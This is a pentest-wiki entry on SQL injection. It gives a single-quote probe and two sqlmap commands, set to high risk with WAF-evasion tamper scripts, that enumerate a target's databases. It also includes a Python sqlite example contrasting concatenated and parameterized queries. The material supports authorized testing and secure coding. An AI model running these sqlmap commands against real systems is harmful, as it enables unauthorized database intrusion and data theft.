Cobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V5 - Validation/Sanitization

SQL Injection

POC

1. Insert a single quote (') as the payload to see the SQL error message.
2. Save the request in a test.req file.
3. Send the file to sqlmap with a command similar to one of these:

   sqlmap -r test.req --dbms=mysql --level 3 --risk 3 --timeout 100 --flush-session --time-sec=2 --dbs --threads 10 --identify-waf

   sqlmap -r test.req --dbms=mysql --level 3 --risk 3 --timeout 100 --flush-session --technique=B --time-sec=2 --dbs --threads 10 --tamper=between,informationschemacomment,bluecoat,charencode --drop-set-cookie --fresh-queries --binary-fields --identify-waf
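The single-quote check in step 1 produces an error only when input is concatenated into the SQL text. The following added example (not part of the original wiki entry) contrasts a concatenated lookup with a parameterized one; it uses Python's sqlite3 as a stand-in for the MySQL target, and the table, function names and sample values are constructed for illustration.

```python
import sqlite3


def make_db():
    """Constructed in-memory table standing in for the application's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO users (name) VALUES (?)",
                     [("alice",), ("O'Brien",)])
    return conn


def lookup_vulnerable(conn, name):
    # Input is concatenated into the SQL text, so a quote in `name`
    # ends the string literal early and changes the statement's syntax.
    query = "SELECT id, name FROM users WHERE name = '" + name + "'"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn, name):
    # Input is bound as data; the SQL text is the same for every call.
    return conn.execute(
        "SELECT id, name FROM users WHERE name = ?", (name,)
    ).fetchall()


def probe(lookup, conn, value):
    """Return ('error', message) if the database rejects the statement,
    otherwise ('ok', rows)."""
    try:
        return ("ok", lookup(conn, value))
    except sqlite3.Error as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    conn = make_db()
    # A plain name, the bare quote from step 1, and a legitimate name
    # that happens to contain an apostrophe.
    for value in ("alice", "'", "O'Brien"):
        print(repr(value), "concatenated: ", probe(lookup_vulnerable, conn, value))
        print(repr(value), "parameterized:", probe(lookup_parameterized, conn, value))
```

The concatenated lookup fails on both the bare quote and the legitimate name O'Brien, while the parameterized lookup treats each as plain data, which makes it usable as a regression check after a fix.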

Impact

High

Likelihood

High